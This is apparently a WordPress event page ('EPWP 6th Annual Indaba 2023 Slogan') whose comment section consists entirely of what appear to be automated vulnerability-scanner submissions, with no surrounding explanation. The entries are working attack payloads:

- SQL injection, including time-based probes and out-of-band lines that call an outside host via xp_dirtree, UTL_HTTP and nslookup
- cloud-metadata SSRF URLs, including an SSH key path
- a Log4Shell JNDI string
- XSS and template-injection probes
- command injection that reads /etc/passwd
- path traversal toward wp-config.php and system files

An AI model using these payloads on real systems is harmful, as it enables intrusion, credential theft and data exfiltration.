EPWP 6th Annual Indaba 2023 Slogan

456 Responses

1. commentx7xthoax

2. x7yb7ww5′”x7yb7ww5

3. comment

4. comment

5. comment

6. comment

7. comment

8. ${applicationScope}

9. ${requestScope}

10. ${“asdflkj”.toString().replace(“d”,”x”)}

11. #{“asdflkj”.toString().replace(“d”,”x”)}

12. comment” && sleep(00) && “1”!=”1

13. comment” && sleep(10000) && “1”!=”1

14. comment” && “1”==”0

15. comment” && “1”==”1

16. comment’ && ‘1’==’0

17. comment’ && ‘1’==’1

18. http://appspidered.rapid7.com/

19. http://169.254.169.254/latest/meta-data/

20. http://169.254.169.254/latest/meta-data/ami-id

21. http://169.254.169.254/latest/meta-data/reservation-id

22. http://169.254.169.254/latest/meta-data/hostname

23. http://169.254.169.254/latest/meta-data/network/interfaces/macs/

24. http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

25. http://169.254.169.254/latest/dynamic/instance-identity/document

26. http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15

27. http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15

28. http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15

29. ${jndi:ldap://dd05060e28cbb2133dcb135e8e8ea7ddfe02816c.oob.appspidered.rapid7.${lower:COM}}

30. http://appspidered.rapid7.com/xss/script/9e8277a466d71239bf81dbdcc59cceba7fec4e20

31. http://appspidered.rapid7.com/xss/script/4bce497659c1878a434be62df0d7ae644a7d7be1

32. http://appspidered.rapid7.com/xss/script/093077b5e7847be9f038da84f952b20aa85789ae

33. http://appspidered.rapid7.com/xss/script/e35dcc9994743530f4daf43371fb152d5088eb74

34. https://appspidered.rapid7.com/xss/script/0eda412efd6e283e3d33502fd72aa1eadd2f5874

35. https://appspidered.rapid7.com/xss/script/e3d03a1a40516b504ff81cdb58d4c005fef3f656

36. https://appspidered.rapid7.com/xss/script/8f55dffd139b4399df30abe9aba39d01a1a272a1

37. https://appspidered.rapid7.com/xss/script/15993d0f6743ae6c4ec376384c282af5cf434e61

38. http://appspidered.rapid7.com/xss/script/4927f19de5d325bae1203ffd00779607f6c1df6e

39. http://appspidered.rapid7.com/xss/script/b089868bd619c5244234f4876d350649e8a90aac

40. http://appspidered.rapid7.com/xss/script/85f276f569af198d747a73e044c30f6dcaf27709

41. http://appspidered.rapid7.com/xss/script/7ff3f0bad47e8c3a43be8ac8c42e8079e958c24f

42. https://appspidered.rapid7.com/xss/script/15a8081079af107dc492f5314f22ef737aead9a9

43. https://appspidered.rapid7.com/xss/script/7cf0c9982daea38381baaf5d89d91f0e7e21d3f7

44. https://appspidered.rapid7.com/xss/script/f22627b433c6f200e913a427c49d965934a4c05c

45. https://appspidered.rapid7.com/xss/script/2fb13f4343ef2325c6398df36a7bf6aa6e753942

46. appspidered.rapid7.com/xss/script/bd7320883df2dc9f8bdf173a3685c46c0a3e056b

47. appspidered.rapid7.com/xss/script/2c2672db81b12628fd661c1864ee813e391ca48c

48. appspidered.rapid7.com/xss/script/2b9cf076a863261c138ede97229c656709b39d20

49. appspidered.rapid7.com/xss/script/29f9df7950028819df17ccfd3aec5247ab2a4ffb

50. commentcommentcomment

51. 655321

52. ./*][

53. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

54. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

55. comment’;+exec+master..xp_dirtree+”//38279255f67f37e45b8033b008ac5742273522e0.oob.appspidered.rapid7.com/a”–

56. comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’131fead3251cc230f12cf2349b11b068258440f4.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–

57. comment’;+SELECT+LOAD_FILE(‘\\\\3ea7a32567e0638803ce57f7801e3ceb3e5b50ac.oob.appspidered.rapid7.com\\a’)#

58. comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\16b6ed33a9788795e7949c049421c20413129a45.oob.appspidered.rapid7.com\\a’#

59. comment’;+copy+(SELECT+”)+to+program+’nslookup+e3debbc716472740e6796eb72a5ea82acc5a238f.oob.appspidered.rapid7.com’–

60. comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://d397075e0686011ef9c5e6003acaf67c26f471b1.oob.appspidered.rapid7.com/’)+END)–

61. {{ 58719 * 21973 }}

62. {{ 62951705 + 74179523 }}

63. *

64. |

65. comment|

66. &

67. comment&

68. comment)

69. !comment

70. ‘comment

71. comment’

72. comment”

73. comment%’

74. comment%u0027

75. comment%27

76. comment%”

77. comment%u0022

78. comment%22

79. LIMIT a

80. 1e309

81. char(0x27)char(0x27)comment

82. %u2018comment

83. %u2019comment

84. %u201acomment

85. %u201bcomment

86. %u201ccomment

87. %u201dcomment

88. %u201ecomment

89. — comment

90. /*comment

91. commentʼ

92. comment’ UNION ALL select NULL —

93. comment” UNION ALL select NULL —

94. SELECT * FROM “master”

95. SELECC * FROM “ds”

96. http://www.example.com/

97. https://example.com/

98. ftp://example.com/

99. http://example.com/

100. gopher://example.com/

101. example.com/

102. .example.com/

103. https://example.com/comment

104. ‘.phpinfo().’

105. comment’ AND ‘1’=’0

106. comment’ AND ‘1’=’1

107. comment” AND “1”=”0

108. comment” AND “1”=”1

109. comment’ AND 1=0/*

110. comment’ AND 1=1/*

111. comment’ AND 1=0)/*

112. comment’ AND 1=1)/*

113. comment’ AND 1=0–

114. comment’ AND 1=1–

115. comment’ AND 1=0)–

116. comment’ AND 1=1)–

117. comment’) AND (‘1’=’0

118. comment’) AND (‘1’=’1

119. comment”) AND (“1″”=”0

120. comment”) AND (“1″”=”1

121. comment’ AND 1=0 LIMIT 1–

122. comment’ AND 1=1 LIMIT 1–

123. REPEAT(0x636f6d6d656e74,2)

124. REPEAT(0x636f6d6d656e74,1)

125. comment OR 1=1

126. comment OR 1=0

127. comment’ OR ‘1’=’1

128. comment’ OR ‘1’=’0

129. comment” OR “1”=”1

130. comment”) OR (“1″=”1

131. comment”) OR (“1″=”0

132. comment’ OR 1=0 —

133. comment” OR “1”=”0

134. comment’) OR (‘1’=’0

135. comment’) OR (‘1’=’1

136. comment’ OR 1=0 ##

137. comment’ OR 1=1 ##

138. comment’ OR 1=1 —

139. comment’) AND ‘1’ in (‘0

140. comment’) AND ‘1’ in (‘1

141. comment”) AND “1” in (“0

142. comment”) AND “1” in (“1

143. comment’) OR ‘1’ in (‘0

144. comment’) OR ‘1’ in (‘1

145. comment”) OR “1” in (“0

146. comment”) OR “1” in (“1

147. comment DESC

148. comment ASC

149. 1, comment DESC

150. 1, comment ASC

151. comment

152. comment

153. comment

154. comment

155. comment

156. comment

157. comment

158. comment

159. comment

160. comment

161. comment

162. comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

163. comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

164. comment and 1 in (select BENCHMARK(14727,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

165. comment and 1 in (select BENCHMARK(951,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

166. comment and 1 in (select BENCHMARK(72,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

167. comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

168. comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

169. comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

170. comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

171. comment’ and 1 in (select BENCHMARK(12343,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

172. comment’ and 1 in (select BENCHMARK(731,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

173. comment’ and 1 in (select BENCHMARK(40,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

174. comment’ and 1 in (select BENCHMARK(2,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

175. comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

176. comment’ and 1 in (select*from(select(sleep(00)))a) —

177. comment’ and 1 in (select*from(select(sleep(05)))a) —

178. ‘ (select*from(select(sleep(00)))a) ‘

179. ‘ (select*from(select(sleep(05)))a) ‘

180. comment’);WAITFOR DELAY ’00:00:00′–

181. comment’);WAITFOR DELAY ’00:00:05′–

182. comment AND pg_sleep(00) is not null

183. comment AND pg_sleep(05) is not null

184. comment ‘;select pg_sleep(00);– –

185. comment ‘;select pg_sleep(05);– –

186. comment ;select pg_sleep(00);– –

187. comment ;select pg_sleep(05);– –

188. alert(10400877)

189. alert(10527967)

190. alert(10663180)

191. alert(10790252)

192. “>alert(10909200)

193. “>alert(11028063)

194. “>alert(11142843)

195. “>alert(11253513)

196. ‘>alert(11384733)

197. ‘>alert(11491359)

198. ‘>alert(11589736)

199. ‘>alert(11688120)

200. “>

201. “>

202. “>

203. ‘>

204. ‘>

205. ‘>

206. {constructor.constructor(12692424)}

207. {constructor.constructor(12909683)}

208. {constructor.constructor(13053087)}

209. {constructor.constructor(13196518)}

210. comment$0

211. comment;/etc/passwd

212. comment|/bin/cat /etc/passwd

213. comment|/bin/cat /etc/passwd|

214. comment;/etc/hosts

215. comment|/bin/cat /etc/hosts

216. comment|/bin/cat /etc/hosts|

217. comment;/usr/bin/id

218. comment|/bin/cat /usr/bin/id

219. comment|/bin/cat /usr/bin/id|

220. type c:\boot.ini

221. comment&dir

222. comment&ipconfig

223. echo foobar x7frai0o

224. comment&& echo foobar x7f9ealb

225. comment| echo foobar x7gqvk19

226. comment| echo foobar x7haurw3|

227. comment< echo foobar x7hsb2eg

228. netstat -na

229. comment&&netstat -na

230. comment|netstat -na

231. comment|netstat -na|

232. comment;netstat ;

233. comment<netstat -na

234. ping -h

235. comment&&ping -h

236. comment|ping -h

237. comment|ping -h|

238. comment<ping -h

239. $LANG

240. comment&&$LANG

241. comment|$LANG

242. comment|$LANG|

243. comment<$LANG

244. ; free

245. ;ping localhost -c 21;

246. ;TIMEOUT /T 10 /NOBREAK;

247. x7r8saqr

248. x7so0m1x

249. x7s64emr: x7s64emr

250. wp-comments-post.php

251. /etc/passwd

252. \WINDOWS\system32\drivers\etc\hosts

253. C:\WINDOWS\system32\drivers\etc\hosts

254. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts

255. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm

256. /wp-comments-post.php

257. ../../../../../../../../../../etc/hosts

258. < /etc/passwd

259. /.

260. \.

261. c:\.

262. appspidered.rapid7.com/

263. wp-comments-post.php.

264. ../wp-comments-post.php.

265. ../../wp-comments-post.php.

266. c:\boot.ini.

267. c:\boot.ini

268. d:\boot.ini

269. ../../../../../../boot.ini.

270. ../../../../../../boot.ini

271. noexistnoexist.

272. ../../../../../../../../../../etc/hosts.

273. /..

274. \..

275. c:\..

276. /../../../../../../../../../../..

277. file:/etc/passwd

278. file:/wp-comments-post.php

279. /WEB-INF/web.xml

280. WEB-INF/web.xml

281. file:WEB-INF/web.xml

282. /../../WEB-INF/web.xml

283. \WEB-INF\web.xml

284. /../../../../../../../../../../.

285. noexistnoexist

286. http://localhost/

287. http://localhost:22/

288. package.json.bak

289. package.json.bak%00

290. ../wp-config.php

291. http://appspidered.rapid7.com/rfi/x7f26zrp

292. /../../../../../../../../../../vendor.js

293. ../../../../../

294. ..\..\..\..\..\

299. < /etc/passwd

300. a
     b

301. {comment

302. {‘comment

303. {“comment

304. comment{

305. comment’}

306. comment”}

307. comment}

308. comment/

309. comment/’

310. comment/”

311. /’comment

312. comment”}, {x7v3e4ji:{$meta: “textScore

313. comment’}, {x7wom9k1:{$meta: ‘textScore

314. comment”}}, {x7xd8p9r:{$meta: “textScore

315. comment’}, {x7xwchue:{$meta: ‘textScore

316. comment

317. comment

318. comment

319. comment

320. comment

321. comment

322. comment

323. comment

324. comment

325. comment

326. comment

327. comment

328. comment

329. comment

330. comment

331. comment

332. comment

333. comment

334. comment

335. comment

336. comment

337. comment

338. comment

339. comment

340. comment

341. comment

342. comment

343. comment

344. comment

345. comment

346. comment

347. comment

348. comment

349. comment

350. comment

351. comment

352. comment

353. comment

354. comment

355. comment

356. comment

357. comment

358. comment

359. comment

360. comment

361. comment

362. comment

363. comment

364. comment

365. comment

366. comment

367. comment

368. comment

369. comment

370. comment

371. comment

372. comment

373. comment

374. comment

375. comment

376. comment

377. comment

378. comment

379. comment

380. comment

381. comment

382. comment

383. comment

384. comment

385. comment

386. comment

387. comment

388. comment

389. comment

390. comment

391. comment

392. comment

393. comment

394. comment

395. comment

396. comment

397. comment

398. comment

399. comment

400. comment

401. comment

402. comment

403. comment

404. comment

405. comment

406. comment

407. comment

408. comment

409. comment

410. comment

411. comment

412. comment

413. comment

414. comment

415. comment

416. comment

417. comment

418. comment

419. comment

420. comment

421. comment

422. comment

423. comment

424. comment

425. comment

426. comment

427. comment

428. comment

429. comment

430. comment

431. comment

432. comment

433. comment

434. comment

435. comment

436. comment

437. comment

438. comment

439. comment

440. comment

441. comment

442. comment

443. comment

444. comment

445. comment

446. comment

447. comment

448. comment

449. comment

450. comment

451. comment

452. comment

453. comment

454. comment

455. comment

456. comment